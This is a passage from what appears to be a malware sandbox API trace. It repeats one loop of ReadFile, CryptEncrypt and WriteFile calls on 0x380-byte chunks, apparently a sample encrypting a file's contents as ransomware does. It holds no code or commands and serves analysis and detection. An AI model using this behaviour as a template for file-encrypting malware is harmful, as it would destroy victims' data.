lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.559] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.560] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.560] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.560] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.560] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.560] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.560] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.560] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.560] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.560] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.561] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.561] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.561] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.561] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.561] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.561] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.561] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.561] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.561] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.561] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.561] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.561] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.561] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.561] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.562] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.562] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.562] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.562] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.562] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.562] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.562] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.562] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.562] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.562] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.563] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.563] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.563] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.563] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.563] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.563] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.563] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.563] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.563] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.563] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.563] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.563] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.564] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.564] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.564] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.564] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.564] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.564] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.564] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.564] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.564] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.564] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.564] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.564] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.565] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.565] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.565] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.565] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.565] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.565] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.565] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.565] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.565] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.565] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.566] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.566] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.566] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.566] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.566] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.566] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.566] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.566] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.566] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.566] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.566] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.566] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.566] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.567] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.567] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.567] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.567] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.567] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.567] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.567] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.567] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.567] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.567] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.567] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.567] CryptEncrypt 